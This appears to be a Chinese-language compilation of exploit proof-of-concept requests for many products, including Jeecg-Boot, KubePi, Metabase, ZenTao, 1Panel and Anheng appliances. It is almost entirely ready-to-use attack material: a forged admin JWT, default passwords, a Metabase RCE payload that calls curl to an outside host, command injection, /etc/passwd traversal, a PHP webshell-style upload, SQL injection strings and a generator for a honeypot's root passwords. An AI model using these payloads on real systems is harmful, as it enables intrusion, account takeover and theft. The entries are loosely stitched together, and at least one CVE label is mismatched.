Jeecg-Boot Freemarker 模版注入漏洞(疑似)
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: /
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129
{"apiSelectId":"1290104038414721025","id":"1"}漏洞危害
1、如果被攻击者利用,可直接getshell;
2、如果被攻击者利用,可被用于内网信息收集,扫描目标内网主机;
3、如果被攻击者利用,可攻击运行在内网或本地的应用程序;
4、如果被攻击者利用,可被用作攻击跳板;
修复方法
Jeecg官方暂未修复该漏洞,无法通过升级JeecgBoot版本修复该漏洞,建议:
1、临时禁用Freemarker高危的代码执行类,如:freemarker.template.utility.Execute(ftl利用方式较多,请自行判断)
KubePi JwtSigKey 登陆绕过漏洞CVE-2023-22463
漏洞描述
KubePi 中存在 JWT 硬编码,攻击者通过硬编码可以获取服务器后台管理权限,添加任意用户
漏洞影响
库贝派
网络测绘
“库贝皮”
CVE-2023-22463漏洞复现
POST /kubepi/api/v1/users HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.127 Safari/537.36
accept: application/json
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfX0.XxQmyfq_7jyeYvrjqsOZ4BB4GoSkfLO2NvbKCEQjld8
{
"authenticate": {
"password": "{{randstr}}"
},
"email": "{{randstr}}@qq.com",
"isAdmin": true,
"mfa": {
"enable": false
},
"name": "{{randstr}}",
"nickName": "{{randstr}}",
"roles": [
"Supper User"
]
}
Kuboard默认口令
漏洞描述:
Kuboard,是一款免费的 Kubernetes 图形化管理工具,Kuboard 力图帮助用户快速在 Kubernetes 上落地微服务。Kuboard存在默认口令可以通过默认口令登录Kuboard,管理Kubernetes。
admin/kuboard123
Metabase validate 远程命令执行漏洞CVE-2023-38646
漏洞描述
Metabase是一个开源的数据分析和可视化工具,它可以帮助用户轻松连接到各种数据源,包括数据库、云服务和API,然后使用绘图的界面进行数据查询、分析和可视化。需身份认证的远程攻击者利用该漏洞可以在服务器上以运行元数据库服务器的权限执行任意命令
漏洞影响
元数据库
网络测绘
应用程序=“元数据库”
CVE-2023-38646漏洞复现
POC
GET请求 /api/session/properties
相应包中包含setup-token字段
后用获取到的token发送post数据包:
POST /api/setup/validate HTTP/1.1
Host:
Content-Type: application/json
Content-Length: 812
{
"token": "获取的token",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl ecw14d.dnslog.cn')\n$$--=x",
"advanced-options": false,
"ssl": true
},
"name": "an-sec-research-team",
"engine": "h2"
}
}Milesight VPN server.js 任意文件读取漏洞
GET /../etc/passwd HTTP/1.1
Host:
Accept: /
Content-Type: application/x-www-form-urlencodedNacos-Sync未授权漏洞
https://xxx.xxx.xxx/#/serviceSync
Openfire身份认证绕过漏洞(CVE-2023-32315)
GET /user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............ HTTP/1.1Panabit iXCache网关RCE漏洞CVE-2023-38646
POST /cgi-bin/Maintain/date_config HTTP/1.1
Host: 127.0.0.1:8443
Cookie: pauser_9667402_260=paonline_admin_44432_9663; pauser_9661348_661=paonline_admin_61912_96631
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
ntpserver=0.0.0.0%3Bwhoami&year=2000&month=08&day=15&hour=11&minute=34&second=53&ifname=fxp1Panel loadfile 后台文件读取漏洞
详情可参考:https://zkunu7syvm.feishu.cn/docx/JmKgddUcMo4Rt2xLys4c4lN2nbc
POST /api/v1/file/loadfile HTTP/1.1
Host: [你的主机名或IP地址]
Content-Type: application/json
Content-Length: [请求体长度,以字节为单位]
{"paht":"/etc/passwd"}PigCMS action_flashUpload 任意文件上传漏洞
POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload
HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----aaa
------aaa
Content-Disposition: form-data; name="filePath"; filename="test.php"
Content-Type: video/x-flv
<?php phpinfo();?>
------aaa
/cms/upload/images/2023/08/11/1691722887xXbx.phpQAX-Vpn存在x遍历及任意账号密码修改漏洞
https://x.xxx.xxx.cn/admin/group/xgroupphp?id=1
https://x.xxx.xxx.cn/admin/group/xgroupphp?id=3 cookie: admin id=1; gw admin ticket=1;Yakit任意文件读取
详情可参考原文 有截图复现
原文链接:https://mp.weixin.qq.com/s/IQekVs-UU2Slh6V_frpaug
前言:
yakit是近年新兴的一个BurpSuite平替工具,和burp的区别就在于数据包放过去不用配置ip端口协议这些,但是yakit跑起来感觉卡卡的,远不如burp那么流畅,近期yakit爆出了一个任意文件读取漏洞,此漏洞通过在网页嵌入js代码实现读取yakit使用者设备上的文件
触发版本:
引擎版本< Yaklang 1.2.4-sp2
漏洞条件:
使用yakit的MITM代理并且启用任意插件
Pyload:
监听脚本
#! /bin/python3
import socket
# 监听地址和端口
host = '0.0.0.0'
port = 23800
# 创建socket服务器
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# 绑定并监听端口
server.bind((host, port))
server.listen()
# 接收连接并监听请求
print("Listening...")
while True:
# 接收客户端连接请求
client, address = server.accept()
print(f"Connected by {address}")
# 读取客户端请求数据
request = ''
while True:
input_data = client.recv(1024).decode('utf-8')
request += input_data
if len(input_data) < 1024:
break
# 提取请求头部
headers = request.split('\n')
print("Received headers:")
for header in headers:
print(header)
# 关闭客户端连接
client.close()复现开始:
创建一个html页面并插入payload
启用MITM代理,不启用插件进行访问:
https://mmbiz.qpic.cn/sz_mmbiz_png/OF9Ieq8TATc71LlcBt5FGOn2ibomGw7wMXX7dh9j86aZ7JA0WMoxwHSDdAwnMVSZLoF09zuiamTpkibBtLto8y8KA/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1
启用MITM代理并启用插件进行访问:
https://mmbiz.qpic.cn/sz_mmbiz_png/OF9Ieq8TATc71LlcBt5FGOn2ibomGw7wM1RvwO5nnYhpX3aKZeCDdziaCEcOSDfbIcu2wNe27x7aTsPgBXo8KTsQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1
原理:yakit默认不会对经过MITM代理的流量中的fuzztag进行解析,但是经过插件时会被解析,所以这也是利用限制。
安恒蜜罐2.0.11 提权漏洞
package passwd
import (
"crypto/sha256"
"fmt"
"time"
)
func Main() {
timestamp := time.Now().Unix()
date := time.Unix(timestamp, 0).Format("2006-01-02")
XXX1 := "1234567890!@#$%^&*()" + date + "root"
XXXX1 := sha256.Sum256([]byte(XXX1))
XXXXX1 := fmt.Sprintf("%x", XXXX1)[:16]
VVV1 := "1234567890!@#$%^&*()" + date + "operator"
VVVV1 := sha256.Sum256([]byte(VVV1))
VVVVV1 := fmt.Sprintf("%x", VVVV1)[:16]
println(fmt.Sprintf("[+] root passwd -> %s", XXXXX1))
println(fmt.Sprintf("[+] operator passwd -> %s", VVVVV1))
}安恒明御运维审计与风险控制系统堡垒机任意用户注册
POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
Host: xxx
Cookie: LANG=zh; USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 1121
<?xml version="1.0"?>
<methodCall>
<methodName>web.user_add</methodName>
<params>
<param>
<value>
<array>
<data>
<value>
<string>admin</string>
</value>
<value>
<string>5</string>
</value>
<value>
<string>XX.XX.XX.XX</string>
</value>
</data>
</array>
</value>
</param>
<param>
<value>
<struct>
<member>
<name>uname</name>
<value>
<string>deptadmin</string>
</value>
</member>
<member>
<name>name</name>
<value>
<string>deptadmin</string>
</value>
</member>
<member>
<name>pwd</name>
<value>
<string>Deptadmin@123</string>
</value>
</member>
<member>
<name>authmode</name>
<value>
<string>1</string>
</value>
</member>
<member>
<name>deptid</name>
<value>
<string></string>
</value>
</member>
<member>
<name>email</name>
<value>
<string></string>
</value>
</member>
<member>
<name>mobile</name>
<value>
<string></string>
</value>
</member>
<member>
<name>comment</name>
<value>
<string></string>
</value>
</member>
<member>
<name>roleid</name>
<value>
<string>101</string>
</value>
</member>
</struct></value>
</param>
</params>
</methodCall>禅道 16.5 router.class.php SQL注入漏洞
POST /user-login.html
account=admin%27+and+%28select+extractvalue%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%29%29%23禅道v18.0-v18.3后台命令执行
该poc来自链接:https://pan.baidu.com/s/1wZoSo30EXiw9vMQBPtKFWg?pwd=zyxa
提取码:zyxa
详情自行查看
POC:
POST /zentaopms/www/index.php?m=zahost&f=create HTTP/1.1
Host: 127.0.0.1
UserAgent: Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:109.0)Gecko/20100101Firefox/110.0Accept:application/json,text/javascript,*/*;q=0.01
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding:gzip,deflate
Referer:http://127.0.0.1/zentaopms/www/index.php?m=zahost&f=create
Content-Type:application/x-www-form-urlencoded;charset=UTF-8
X-Requested-With:XMLHttpRequest
Content-Length:134
Origin:http://127.0.0.1
Connection:close
Cookie:zentaosid=dhjpu2i3g51l6j5eba85aql27f;lang=zhcn;device=desktop;theme=default;tab=qa;windowWidth=1632;windowHeight=783
Sec-Fetch-Dest:empty
Sec-Fetch-Mode:cors
Sec-Fetch-Site:same-origin
vsoft=kvm&hostType=physical&name=penson&extranet=127.0.0.1%7Ccalc.exe&cpuCores=
2&memory=16&diskSize=16&desc=&uid=640be59da4851&type=za
辰信景云终端安全管理系统 login SQL 注入漏洞
POST /api/user/login
captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='
评论 (0)